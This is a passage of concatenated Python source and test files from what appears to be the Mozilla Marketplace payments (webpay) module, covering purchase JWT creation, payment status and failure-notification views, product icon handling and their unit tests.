.with_args(url, timeout=arg.any())
.returns_fake()
.expects('iter_content')
.returns(self.open_img())
.expects('raise_for_status'))
self.fetch(url, ext_size, size)
prod = ProductIcon.objects.get()
eq_(prod.ext_size, ext_size)
eq_(prod.size, size)
assert storage.exists(prod.storage_path()), 'Image not created'
@fudge.patch('mkt.webpay.tasks.requests')
@fudge.patch('mkt.webpay.tasks._resize_image')
def test_no_resize_when_exact(self, fake_req, resize):
url = 'http://site/media/my.jpg'
(fake_req.expects('get')
.returns_fake()
.expects('iter_content')
.returns(self.open_img())
.expects('raise_for_status'))
size = 64
self.fetch(url=url, ext_size=size, size=size)
prod = ProductIcon.objects.get()
eq_(prod.size, size)
assert storage.exists(prod.storage_path()), 'Image not created'
@fudge.patch('mkt.webpay.tasks.requests')
@fudge.patch('mkt.webpay.tasks._resize_image')
def test_no_resize_when_smaller(self, fake_req, resize):
url = 'http://site/media/my.jpg'
(fake_req.expects('get')
.returns_fake()
.expects('iter_content')
.returns(self.open_img())
.expects('raise_for_status'))
size = 22
self.fetch(url=url, ext_size=size, size=64)
prod = ProductIcon.objects.get()
eq_(prod.size, size)
eq_(prod.ext_size, size)
assert storage.exists(prod.storage_path()), 'Image not created'
########NEW FILE########
__FILENAME__ = test_views
import json
from decimal import Decimal
from django.conf import settings
from django.core import mail
from django.core.urlresolvers import reverse
from django.http import HttpRequest
import jwt
from mock import patch
from nose.tools import eq_, ok_
import mkt
from access.models import GroupUser
from amo import CONTRIB_PENDING, CONTRIB_PURCHASE
from amo.tests import TestCase
from constants.payments import PROVIDER_BANGO
from mkt.api.tests.test_oauth import RestOAuth
from mkt.constants import regions
from mkt.purchase.tests.utils import InAppPurchaseTest, PurchaseTest
from mkt.site.fixtures import fixture
from mkt.prices.models import Price, PriceCurrency
from mkt.prices.views import PricesViewSet
from mkt.webpay.models import ProductIcon
from stats.models import Contribution
from users.models import UserProfile
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request',
lambda s, r: mkt.regions.US)
class TestPrepareWebApp(PurchaseTest, RestOAuth):
fixtures = fixture('webapp_337141', 'user_2519', 'prices')
def setUp(self):
RestOAuth.setUp(self) # Avoid calling PurchaseTest.setUp().
self.user = UserProfile.objects.get(pk=2519)
self.list_url = reverse('webpay-prepare')
self.setup_base()
self.setup_package()
self.setup_mock_generic_product()
self.setup_public_id()
def _post(self, client=None, extra_headers=None):
if client is None:
client = self.client
if extra_headers is None:
extra_headers = {}
return client.post(self.list_url,
data=json.dumps({'app': self.addon.pk}),
**extra_headers)
def test_allowed(self):
self._allowed_verbs(self.list_url, ['post'])
def test_anon(self):
res = self._post(self.anon)
eq_(res.status_code, 403)
eq_(res.json,
{'detail': 'Authentication credentials were not provided.'})
def test_get_jwt(self, client=None, extra_headers=None):
res = self._post(client=client, extra_headers=extra_headers)
eq_(res.status_code, 201, res.content)
contribution = Contribution.objects.get()
eq_(res.json['contribStatusURL'],
reverse('webpay-status', kwargs={'uuid': contribution.uuid}))
ok_(res.json['webpayJWT'])
@patch.object(settings, 'SECRET_KEY', 'gubbish')
def test_good_shared_secret(self):
# Like test_good, except we do shared secret auth manually.
extra_headers = {
'HTTP_AUTHORIZATION': 'mkt-shared-secret '
'[email protected],56b6f1a3dd735d962c56'
'ce7d8f46e02ec1d4748d2c00c407d75f0969d08bb'
'9c68c31b3371aa8130317815c89e5072e31bb94b4'
'121c5c165f3515838d4d6c60c4,165d631d3c3045'
'458b4516242dad7ae'
}
self.user.update(email='[email protected]')
self.test_get_jwt(client=self.anon, extra_headers=extra_headers)
@patch('mkt.webapps.models.Webapp.has_purchased')
def test_already_purchased(self, has_purchased):
has_purchased.return_value = True
res = self._post()
eq_(res.status_code, 409)
eq_(res.json, {"reason": "Already purchased app."})
class TestPrepareInApp(InAppPurchaseTest, RestOAuth):
fixtures = fixture('webapp_337141', 'user_2519', 'prices')
def setUp(self):
RestOAuth.setUp(self) # Avoid calling PurchaseTest.setUp().
self.user = UserProfile.objects.get(pk=2519)
self.setup_base()
self.setup_package()
self.setup_public_id()
self.list_url = reverse('webpay-prepare-inapp')
def _post(self, inapp_id=None, extra_headers=None):
inapp_id = inapp_id or self.inapp.pk
extra_headers = extra_headers or {}
return self.anon.post(self.list_url,
data=json.dumps({'inapp': inapp_id}),
**extra_headers)
def test_allowed(self):
self._allowed_verbs(self.list_url, ['post'])
def test_bad_id_raises_400(self):
res = self._post(inapp_id='invalid id')
eq_(res.status_code, 400, res.content)
def test_get_jwt(self, extra_headers=None):
res = self._post(extra_headers=extra_headers)
eq_(res.status_code, 201, res.content)
contribution = Contribution.objects.get()
eq_(res.json['contribStatusURL'],
reverse('webpay-status', kwargs={'uuid': contribution.uuid}))
ok_(res.json['webpayJWT'])
class TestStatus(RestOAuth):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
super(TestStatus, self).setUp()
self.contribution = Contribution.objects.create(
addon_id=337141, user_id=2519, type=CONTRIB_PURCHASE,
uuid='some:uid')
self.get_url = reverse('webpay-status',
kwargs={'uuid': self.contribution.uuid})
def test_allowed(self):
self._allowed_verbs(self.get_url, ['get'])
def test_get(self):
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
eq_(res.json['status'], 'complete')
def test_no_contribution(self):
self.contribution.delete()
res = self.client.get(self.get_url)
eq_(res.status_code, 200, res.content)
eq_(res.json['status'], 'incomplete', res.content)
def test_incomplete(self):
self.contribution.update(type=CONTRIB_PENDING)
res = self.client.get(self.get_url)
eq_(res.status_code, 200, res.content)
eq_(res.json['status'], 'incomplete', res.content)
def test_no_purchase(self):
self.contribution.addon.addonpurchase_set.get().delete()
res = self.client.get(self.get_url)
eq_(res.status_code, 200, res.content)
eq_(res.json['status'], 'incomplete', res.content)
def test_not_owner(self):
userprofile2 = UserProfile.objects.get(pk=31337)
self.contribution.update(user=userprofile2)
res = self.client.get(self.get_url)
eq_(res.status_code, 403, res.content)
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request',
lambda s, r: mkt.regions.BR)
class TestPrices(RestOAuth):
def make_currency(self, amount, tier, currency, region):
return PriceCurrency.objects.create(
price=Decimal(amount), tier=tier,
currency=currency, provider=PROVIDER_BANGO, region=region.id)
def setUp(self):
super(TestPrices, self).setUp()
self.price = Price.objects.create(name='1', price=Decimal(1))
self.currency = self.make_currency(3, self.price, 'DE', regions.DE)
self.us_currency = self.make_currency(3, self.price, 'USD', regions.US)
self.list_url = reverse('price-list')
self.get_url = reverse('price-detail', kwargs={'pk': self.price.pk})
# If regions change, this will blow up.
assert regions.BR.default_currency == 'BRL'
def get_currencies(self, data):
return [p['currency'] for p in data['prices']]
def test_list_allowed(self):
self._allowed_verbs(self.list_url, ['get'])
self._allowed_verbs(self.get_url, ['get'])
def test_single(self):
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
eq_(res.json['pricePoint'], '1')
eq_(res.json['name'], 'Tier 1')
# Ensure that price is in the JSON since solitude depends upon it.
eq_(res.json['price'], '1.00')
def test_list_filtered_price_point(self):
Price.objects.create(name='42', price=Decimal(42))
res = self.client.get(self.list_url, {'pricePoint': '1'})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 1)
eq_(data['objects'][0]['pricePoint'], '1')
def test_list(self):
res = self.client.get(self.list_url)
eq_(res.json['meta']['total_count'], 1)
self.assertSetEqual(self.get_currencies(res.json['objects'][0]),
['USD', 'DE'])
def test_list_filtered_provider(self):
self.currency.update(provider=0)
res = self.client.get(self.list_url, {'provider': 'bango'})
eq_(self.get_currencies(res.json['objects'][0]), ['USD'])
def test_prices(self):
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
self.assertSetEqual(self.get_currencies(res.json), ['USD', 'DE'])
def test_prices_filtered_provider(self):
self.currency.update(provider=0)
res = self.client.get(self.get_url, {'provider': 'bango'})
eq_(res.status_code, 200)
self.assertSetEqual(self.get_currencies(res.json), ['USD'])
def test_has_cors(self):
self.assertCORS(self.client.get(self.get_url), 'get')
@patch('mkt.api.exceptions.got_request_exception')
@patch('mkt.prices.models.Price.prices')
def test_other_cors(self, prices, got_request_exception):
prices.side_effect = ValueError('The Price Is Not Right.')
res = self.client.get(self.get_url)
eq_(res.status_code, 500)
self.assertCORS(res, 'get')
exception_handler_args = got_request_exception.send.call_args
eq_(exception_handler_args[0][0], PricesViewSet)
eq_(exception_handler_args[1]['request'].path, self.get_url)
ok_(isinstance(exception_handler_args[1]['request'], HttpRequest))
def test_locale(self):
self.make_currency(5, self.price, 'BRL', regions.BR)
res = self.client.get(self.get_url, HTTP_ACCEPT_LANGUAGE='pt-BR')
eq_(res.status_code, 200)
eq_(res.json['localized']['locale'], 'R$5,00')
def test_locale_list(self):
# Check that for each price tier a different localisation is
# returned.
self.make_currency(2, self.price, 'BRL', regions.BR)
price_two = Price.objects.create(name='2', price=Decimal(1))
self.make_currency(12, price_two, 'BRL', regions.BR)
res = self.client.get(self.list_url, HTTP_ACCEPT_LANGUAGE='pt-BR')
eq_(res.status_code, 200)
eq_(res.json['objects'][0]['localized']['locale'], 'R$2,00')
eq_(res.json['objects'][1]['localized']['locale'], 'R$12,00')
def test_no_locale(self):
# This results in a region of BR and a currency of BRL. But there
# isn't a price tier for that currency. So we don't know what to show.
res = self.client.get(self.get_url, HTTP_ACCEPT_LANGUAGE='pt-BR')
eq_(res.status_code, 200)
eq_(res.json['localized'], {})
class TestNotification(RestOAuth):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
super(TestNotification, self).setUp()
self.grant_permission(self.profile, 'Transaction:NotifyFailure')
self.contribution = Contribution.objects.create(addon_id=337141,
uuid='sample:uuid')
self.get_url = reverse('webpay-failurenotification',
kwargs={'pk': self.contribution.pk})
self.data = {'url': 'https://someserver.com', 'attempts': 5}
def test_list_allowed(self):
self._allowed_verbs(self.get_url, ['patch'])
def test_notify(self):
res = self.client.patch(self.get_url, data=json.dumps(self.data))
eq_(res.status_code, 202)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
assert self.data['url'] in msg.body
eq_(msg.recipients(), [u'[email protected]'])
def test_no_permission(self):
GroupUser.objects.filter(user=self.profile).delete()
res = self.client.patch(self.get_url, data=json.dumps(self.data))
eq_(res.status_code, 403)
def test_missing(self):
res = self.client.patch(self.get_url, data=json.dumps({}))
eq_(res.status_code, 400)
def test_not_there(self):
self.get_url = reverse('webpay-failurenotification',
kwargs={'pk': self.contribution.pk + 42})
res = self.client.patch(self.get_url, data=json.dumps(self.data))
eq_(res.status_code, 404)
def test_no_uuid(self):
self.contribution.update(uuid=None)
res = self.client.patch(self.get_url, data=json.dumps(self.data))
eq_(res.status_code, 404)
class TestProductIconResource(RestOAuth):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
super(TestProductIconResource, self).setUp()
self.list_url = reverse('producticon-list')
p = patch('mkt.webpay.tasks.fetch_product_icon')
self.fetch_product_icon = p.start()
self.addCleanup(p.stop)
self.data = {
'ext_size': 128,
'ext_url': 'http://someappnoreally.com/icons/icon_128.png',
'size': 64
}
def post(self, data, with_perms=True):
if with_perms:
self.grant_permission(self.profile, 'ProductIcon:Create')
return self.client.post(self.list_url, data=json.dumps(data))
def test_list_allowed(self):
self._allowed_verbs(self.list_url, ['get', 'post'])
def test_missing_fields(self):
res = self.post({'ext_size': 1})
eq_(res.status_code, 400)
def test_post(self):
res = self.post(self.data)
eq_(res.status_code, 202)
self.fetch_product_icon.delay.assert_called_with(self.data['ext_url'],
self.data['ext_size'],
self.data['size'])
def test_post_without_perms(self):
res = self.post(self.data, with_perms=False)
eq_(res.status_code, 403)
def test_anon_get_filtering(self):
icon = ProductIcon.objects.create(**{
'ext_size': 128,
'ext_url': 'http://someappnoreally.com/icons/icon_128.png',
'size': 64,
'format': 'png'
})
extra_icon = ProductIcon.objects.create(**{
'ext_size': 256,
'ext_url': 'http://someappnoreally.com/icons/icon_256.png',
'size': 64,
'format': 'png'
})
res = self.anon.get(self.list_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
res = self.anon.get(self.list_url, data={'ext_size': 128})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
eq_(data['objects'][0]['url'], icon.url())
res = self.anon.get(self.list_url, data={'size': 64})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
res = self.anon.get(
self.list_url,
data={'ext_url': 'http://someappnoreally.com/icons/icon_256.png'})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
eq_(data['objects'][0]['url'], extra_icon.url())
class TestSigCheck(TestCase):
def test(self):
key = 'marketplace'
aud = 'webpay'
secret = 'third door on the right'
with self.settings(APP_PURCHASE_SECRET=secret,
APP_PURCHASE_KEY=key,
APP_PURCHASE_AUD=aud):
res = self.client.post(reverse('webpay-sig_check'))
eq_(res.status_code, 201, res)
data = json.loads(res.content)
req = jwt.decode(data['sig_check_jwt'].encode('ascii'), secret)
eq_(req['iss'], key)
eq_(req['aud'], aud)
eq_(req['typ'], 'mozilla/payments/sigcheck/v1')
########NEW FILE########
__FILENAME__ = test_webpay_jwt
import urlparse
from urllib import urlencode
from django.conf import settings
from django.test.utils import override_settings
import jwt
from mozpay.verify import verify_claims, verify_keys
from nose.tools import eq_, raises
from amo.helpers import absolutify
from constants.payments import PROVIDER_BOKU
from mkt.developers.models import AddonPaymentAccount, PaymentAccount
from amo.urlresolvers import reverse
from mkt.purchase.tests.utils import InAppPurchaseTest, PurchaseTest
from mkt.webpay.webpay_jwt import (get_product_jwt, InAppProduct,
WebAppProduct)
from stats.models import Contribution
class TestPurchaseJWT(PurchaseTest):
def setUp(self):
super(TestPurchaseJWT, self).setUp()
self.product = WebAppProduct(self.addon)
self.contribution = Contribution.objects.create(
user=self.user,
addon=self.addon,
)
def decode_token(self):
token = get_product_jwt(self.product, self.contribution)
return jwt.decode(str(token['webpayJWT']), verify=False)
def test_claims(self):
verify_claims(self.decode_token())
def test_keys(self):
verify_keys(self.decode_token(),
('iss',
'typ',
'aud',
'iat',
'exp',
'request.name',
'request.description',
'request.pricePoint',
'request.postbackURL',
'request.chargebackURL',
'request.productData'))
def test_valid_jwt(self):
token_data = self.decode_token()
eq_(token_data['iss'], settings.APP_PURCHASE_KEY)
eq_(token_data['typ'], settings.APP_PURCHASE_TYP)
eq_(token_data['aud'], settings.APP_PURCHASE_AUD)
request = token_data['request']
eq_(request['id'], self.product.external_id())
eq_(request['name'], self.product.name())
eq_(request['icons'], self.product.icons())
eq_(request['description'], self.product.description())
eq_(request['pricePoint'], self.product.price().name)
eq_(request['postbackURL'], absolutify(reverse('webpay.postback')))
eq_(request['chargebackURL'], absolutify(reverse('webpay.chargeback')))
token_product_data = urlparse.parse_qs(request['productData'])
expected_product_data = urlparse.parse_qs(
urlencode(self.product.product_data(self.contribution)))
eq_(token_product_data, expected_product_data)
@raises(ValueError)
def test_empty_public_id(self):
self.addon.update(solitude_public_id=None)
self.decode_token()
class BaseTestWebAppProduct(PurchaseTest):
def setUp(self):
super(BaseTestWebAppProduct, self).setUp()
self.product = WebAppProduct(self.addon)
self.contribution = Contribution.objects.create(
user=self.user,
addon=self.addon,
)
self.contribution = Contribution.objects.get()
class TestWebAppProduct(BaseTestWebAppProduct):
def test_external_id_with_no_domain(self):
with self.settings(DOMAIN=None):
eq_(self.product.external_id(),
'marketplace-dev:{0}'.format(self.addon.pk))
def test_external_id_with_domain(self):
with self.settings(DOMAIN='marketplace.allizom.org'):
eq_(self.product.external_id(),
'marketplace:{0}'.format(self.addon.pk))
def test_webapp_product(self):
eq_(self.product.id(), self.addon.pk)
eq_(self.product.name(), unicode(self.addon.name))
eq_(self.product.addon(), self.addon)
eq_(self.product.price(), self.addon.premium.price)
eq_(self.product.icons()['512'],
absolutify(self.addon.get_icon_url(512)))
eq_(self.product.description(), self.addon.description)
eq_(self.product.application_size(),
self.addon.current_version.all_files[0].size)
product_data = self.product.product_data(self.contribution)
eq_(product_data['contrib_uuid'], self.contribution.uuid)
eq_(product_data['public_id'], self.public_id)
eq_(product_data['addon_id'], self.product.addon().pk)
eq_(product_data['application_size'], self.product.application_size())
@override_settings(PAYMENT_PROVIDERS=['bango', 'boku'])
class TestWebAppProductMultipleProviders(BaseTestWebAppProduct):
def setUp(self):
super(TestWebAppProductMultipleProviders, self).setUp()
account = PaymentAccount.objects.create(
user=self.user, uri='foo', name='test', inactive=False,
solitude_seller=self.seller, account_id=321, seller_uri='abc',
provider=PROVIDER_BOKU)
AddonPaymentAccount.objects.create(
addon=self.addon, account_uri='foo',
payment_account=account, product_uri='newuri')
def test_webapp_product_multiple_providers(self):
product_data = self.product.product_data(self.contribution)
eq_(product_data['contrib_uuid'], self.contribution.uuid)
eq_(product_data['public_id'], self.public_id)
eq_(product_data['addon_id'], self.product.addon().pk)
eq_(product_data['application_size'],
self.product.application_size())
class TestInAppProduct(InAppPurchaseTest):
def setUp(self):
super(TestInAppProduct, self).setUp()
self.contribution = Contribution.objects.create(
user=self.user,
addon=self.addon,
)
self.product = InAppProduct(self.inapp)
def test_external_id_with_no_domain(self):
with self.settings(DOMAIN=None):
eq_(self.product.external_id(),
'inapp.marketplace-dev:{0}'.format(self.inapp.pk))
def test_external_id_with_domain(self):
with self.settings(DOMAIN='marketplace.allizom.org'):
eq_(self.product.external_id(),
'inapp.marketplace:{0}'.format(self.inapp.pk))
def test_inapp_product(self):
eq_(self.product.id(), self.inapp.pk)
eq_(self.product.name(), unicode(self.inapp.name))
eq_(self.product.addon(), self.inapp.webapp)
eq_(self.product.price(), self.inapp.price)
eq_(self.product.icons()[64], absolutify(self.inapp.logo_url))
eq_(self.product.description(), self.inapp.webapp.description)
eq_(self.product.application_size(), None)
product_data = self.product.product_data(self.contribution)
eq_(product_data['contrib_uuid'], self.contribution.uuid)
eq_(product_data['addon_id'], self.product.addon().pk)
eq_(product_data['inapp_id'], self.product.id())
eq_(product_data['application_size'], self.product.application_size())
eq_(product_data['public_id'], self.public_id)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework import routers
from mkt.webpay.views import (FailureNotificationView,
PreparePayWebAppView, PreparePayInAppView,
ProductIconViewSet, sig_check, StatusPayView)
api = routers.SimpleRouter()
api.register(r'product/icon', ProductIconViewSet)
urlpatterns = patterns(
'',
url(r'^', include(api.urls)),
url(r'^webpay/', include(api.urls)),
url(r'^webpay/status/(?P<uuid>[^/]+)/', StatusPayView.as_view(),
name='webpay-status'),
url(r'^webpay/prepare/', PreparePayWebAppView.as_view(),
name='webpay-prepare'),
url(r'^webpay/inapp/prepare/', PreparePayInAppView.as_view(),
name='webpay-prepare-inapp'),
url(r'^webpay/failure/(?P<pk>\d+)/', FailureNotificationView.as_view(),
name='webpay-failurenotification'),
url(r'^webpay/sig_check/$', sig_check, name='webpay-sig_check')
)
########NEW FILE########
__FILENAME__ = utils
from django.conf import settings
import bleach
def strip_tags(text):
# Until atob() supports encoded HTML we are stripping all tags.
# See bug 83152422
return bleach.clean(unicode(text), strip=True, tags=[])
def make_external_id(product):
"""
Generates a webpay/solitude external ID given an addon's primary key.
"""
# This namespace is currently necessary because app products
# are mixed into an application's own in-app products.
# Maybe we can fix that.
# Also, we may use various dev/stage servers with the same
# Bango test API.
domain = getattr(settings, 'DOMAIN', None)
if not domain:
domain = 'marketplace-dev'
external_id = domain.split('.')[0]
return '{0}:{1}'.format(external_id, product.pk)
########NEW FILE########
__FILENAME__ = views
import calendar
import time
import uuid
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import Http404
import commonware.log
from rest_framework import status
from rest_framework.decorators import api_view, permission_classes
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import ListModelMixin, RetrieveModelMixin
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import GenericViewSet
import amo
from amo.helpers import absolutify, urlparams
from amo.utils import send_mail_jinja
from lib.cef_loggers import app_pay_cef
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import (AllowOwner, AllowReadOnly, AnyOf,
GroupPermission)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.webpay.forms import FailureForm, PrepareInAppForm, PrepareWebAppForm
from mkt.webpay.models import ProductIcon
from mkt.webpay.serializers import ProductIconSerializer
from mkt.webpay.webpay_jwt import (get_product_jwt, InAppProduct,
sign_webpay_jwt, WebAppProduct)
from stats.models import Contribution
from . import tasks
log = commonware.log.getLogger('z.webpay')
class PreparePayWebAppView(CORSMixin, MarketplaceView, GenericAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
permission_classes = [IsAuthenticated]
cors_allowed_methods = ['post']
def post(self, request, *args, **kwargs):
form = PrepareWebAppForm(request.DATA)
if not form.is_valid():
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
app = form.cleaned_data['app']
region = getattr(request, 'REGION', None)
if region and region.id not in app.get_price_region_ids():
log.info('Region {0} is not in {1}'
.format(region.id, app.get_price_region_ids()))
return Response('Payments are limited and flag not enabled',
status=status.HTTP_403_FORBIDDEN)
if app.is_premium() and app.has_purchased(request._request.amo_user):
log.info('Already purchased: {0}'.format(app.pk))
return Response({'reason': u'Already purchased app.'},
status=status.HTTP_409_CONFLICT)
app_pay_cef.log(request._request, 'Preparing JWT', 'preparing_jwt',
'Preparing JWT for: {0}'.format(app.pk), severity=3)
log.debug('Starting purchase of app: {0} by user: {1}'.format(
app.pk, request._request.amo_user))
contribution = Contribution.objects.create(
addon_id=app.pk,
amount=app.get_price(region=request._request.REGION.id),
paykey=None,
price_tier=app.premium.price,
source=request._request.REQUEST.get('src', ''),
source_locale=request._request.LANG,
type=amo.CONTRIB_PENDING,
user=request._request.amo_user,
uuid=str(uuid.uuid4()),
)
log.debug('Storing contrib for uuid: {0}'.format(contribution.uuid))
token = get_product_jwt(WebAppProduct(app), contribution)
return Response(token, status=status.HTTP_201_CREATED)
class PreparePayInAppView(CORSMixin, MarketplaceView, GenericAPIView):
authentication_classes = []
permission_classes = []
cors_allowed_methods = ['post']
def post(self, request, *args, **kwargs):
form = PrepareInAppForm(request.DATA)
if not form.is_valid():
app_pay_cef.log(
request._request,
'Preparing InApp JWT Failed',
'preparing_inapp_jwt_failed',
'Preparing InApp JWT Failed error: {0}'.format(form.errors),
severity=3
)
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
inapp = form.cleaned_data['inapp']
app_pay_cef.log(
request._request,
'Preparing InApp JWT',
'preparing_inapp_jwt',
'Preparing InApp JWT for: {0}'.format(inapp.pk), severity=3
)
log.debug('Starting purchase of in app: {0}'.format(inapp.pk))
contribution = Contribution.objects.create(
addon_id=inapp.webapp.pk,
# In-App payments are unauthenticated so we have no user
# and therefore can't determine a meaningful region.
amount=None,
paykey=None,
price_tier=inapp.price,
source=request._request.REQUEST.get('src', ''),
source_locale=request._request.LANG,
type=amo.CONTRIB_PENDING,
user=None,
uuid=str(uuid.uuid4()),
)
log.debug('Storing contrib for uuid: {0}'.format(contribution.uuid))
token = get_product_jwt(InAppProduct(inapp), contribution)
return Response(token, status=status.HTTP_201_CREATED)
class StatusPayView(CORSMixin, MarketplaceView, GenericAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
permission_classes = [AllowOwner]
cors_allowed_methods = ['get']
queryset = Contribution.objects.filter(type=amo.CONTRIB_PURCHASE)
lookup_field = 'uuid'
def get_object(self):
try:
obj = super(StatusPayView, self).get_object()
except Http404:
# Anything that's not correct will be raised as a 404 so that it's
# harder to iterate over contribution values.
log.info('Contribution not found')
return None
if not obj.addon.has_purchased(self.request.amo_user):
log.info('Not in AddonPurchase table')
return None
return obj
def get(self, request, *args, **kwargs):
self.object = self.get_object()
data = {'status': 'complete' if self.object else 'incomplete'}
return Response(data)
class FailureNotificationView(MarketplaceView, GenericAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
permission_classes = [GroupPermission('Transaction', 'NotifyFailure')]
queryset = Contribution.objects.filter(uuid__isnull=False)
def patch(self, request, *args, **kwargs):
form = FailureForm(request.DATA)
if not form.is_valid():
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
obj = self.get_object()
data = {
'transaction_id': obj,
'transaction_url': absolutify(
urlparams(reverse('mkt.developers.transactions'),
transaction_id=obj.uuid)),
'url': form.cleaned_data['url'],
'retries': form.cleaned_data['attempts']}
owners = obj.addon.authors.values_list('email', flat=True)
send_mail_jinja('Payment notification failure.',
'webpay/failure.txt',
data, recipient_list=owners)
return Response(status=status.HTTP_202_ACCEPTED)
class ProductIconViewSet(CORSMixin, MarketplaceView, ListModelMixin,
RetrieveModelMixin, GenericViewSet):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
permission_classes = [AnyOf(AllowReadOnly,
GroupPermission('ProductIcon', 'Create'))]
queryset = ProductIcon.objects.all()
serializer_class = ProductIconSerializer
cors_allowed_methods = ['get', 'post']
filter_fields = ('ext_url', 'ext_size', 'size')
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.DATA)
if serializer.is_valid():
log.info('Resizing product icon %s @ %s to %s for webpay' % (
serializer.data['ext_url'],
serializer.data['ext_size'],
serializer.data['size']))
tasks.fetch_product_icon.delay(serializer.data['ext_url'],
serializer.data['ext_size'],
serializer.data['size'])
return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['POST'])
@permission_classes((AllowAny,))
def sig_check(request):
"""
Returns a signed JWT to use for signature checking.
This is for Nagios checks to ensure that Marketplace's
signed tokens are valid when processed by Webpay.
"""
issued_at = calendar.timegm(time.gmtime())
req = {
'iss': settings.APP_PURCHASE_KEY,
'typ': settings.SIG_CHECK_TYP,
'aud': settings.APP_PURCHASE_AUD,
'iat': issued_at,
'exp': issued_at + 3600, # expires in 1 hour
'request': {}
}
return Response({'sig_check_jwt': sign_webpay_jwt(req)},
status=201)
########NEW FILE########
__FILENAME__ = webpay_jwt
import calendar
import time
from urllib import urlencode
from django.conf import settings
from django.core.urlresolvers import reverse
import commonware.log
import amo
from amo.helpers import absolutify
from lib.crypto.webpay import sign_webpay_jwt
from mkt.webpay.utils import make_external_id, strip_tags
log = commonware.log.getLogger('z.purchase')
def get_product_jwt(product, contribution):
"""Prepare a JWT for paid products to pass into navigator.pay()"""
issued_at = calendar.timegm(time.gmtime())
product_data = product.product_data(contribution)
if not product_data.get('public_id'):
raise ValueError(
'Cannot create JWT without a cached public_id for '
'app {a}'.format(a=product.addon()))
token_data = {
'iss': settings.APP_PURCHASE_KEY,
'typ': settings.APP_PURCHASE_TYP,
'aud': settings.APP_PURCHASE_AUD,
'iat': issued_at,
'exp': issued_at + 3600, # expires in 1 hour
'request': {
'id': product.external_id(),
'name': unicode(product.name()),
'icons': product.icons(),
'description': strip_tags(product.description()),
'pricePoint': product.price().name,
'productData': urlencode(product_data),
'chargebackURL': absolutify(reverse('webpay.chargeback')),
'postbackURL': absolutify(reverse('webpay.postback')),
}
}
token = sign_webpay_jwt(token_data)
log.debug('Preparing webpay JWT for self.product {0}: {1}'.format(
product.id(), token))
return {
'webpayJWT': token,
'contribStatusURL': reverse(
'webpay-status',
kwargs={'uuid': contribution.uuid}
)
}
class WebAppProduct(object):
"""Binding layer to pass a web app into a JWT producer"""
def __init__(self, webapp):
self.webapp = webapp
def id(self):
return self.webapp.pk
def external_id(self):
return make_external_id(self.webapp)
def name(self):
return self.webapp.name
def addon(self):
return self.webapp
def price(self):
return self.webapp.premium.price
def icons(self):
icons = {}
for size in amo.ADDON_ICON_SIZES:
icons[str(size)] = absolutify(self.webapp.get_icon_url(size))
return icons
def description(self):
return self.webapp.description
def application_size(self):
return self.webapp.current_version.all_files[0].size
def product_data(self, contribution):
return {
'addon_id': self.webapp.pk,
'application_size': self.application_size(),
'contrib_uuid': contribution.uuid,
'public_id': self.addon().solitude_public_id,
}
class InAppProduct(object):
"""Binding layer to pass a in app object into a JWT producer"""
def __init__(self, inapp):
self.inapp = inapp
def id(self):
return self.inapp.pk
def external_id(self):
return 'inapp.{0}'.format(make_external_id(self.inapp))
def name(self):
return self.inapp.name
def addon(self):
return self.inapp.webapp
def price(self):
return self.inapp.price
def icons(self):
# TODO: Default to 64x64 icon until addressed in
# https://bugzilla.mozilla.org/show_bug.cgi?id=981093
return {64: absolutify(self.inapp.logo_url)}
def description(self):
return self.inapp.webapp.description
def application_size(self):
# TODO: Should this be not none, and if so
# How do we determine the size of an in app object?
return None
def product_data(self, contribution):
return {
'addon_id': self.inapp.webapp.pk,
'inapp_id': self.inapp.pk,
'application_size': self.application_size(),
'contrib_uuid': contribution.uuid,
'public_id': self.addon().solitude_public_id,
}
########NEW FILE########
__FILENAME__ = addusertogroup
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
import commonware.log
from access.models import Group, GroupUser
from users.models import UserProfile
class Command(BaseCommand):
help = ('Add a new user to a group. Syntax: \n'
' ./manage.py addusertogroup <userid> <groupid>')
log = commonware.log.getLogger('z.users')
def handle(self, *args, **options):
try:
do_adduser(args[0], args[1])
msg = 'Adding %s to %s\n' % (args[0], args[1])
self.log.info(msg)
self.stdout.write(msg)
except IndexError:
raise CommandError(self.help)
def do_adduser(user, group):
try:
if '@' in user:
user = UserProfile.objects.get(email=user)
elif user.isdigit():
user = UserProfile.objects.get(pk=user)
else:
raise CommandError('Unknown input for user.')
if group.isdigit():
group = Group.objects.get(pk=group)
else:
raise CommandError('Group must be a valid ID.')
GroupUser.objects.create(user=user, group=group)
except IntegrityError, e:
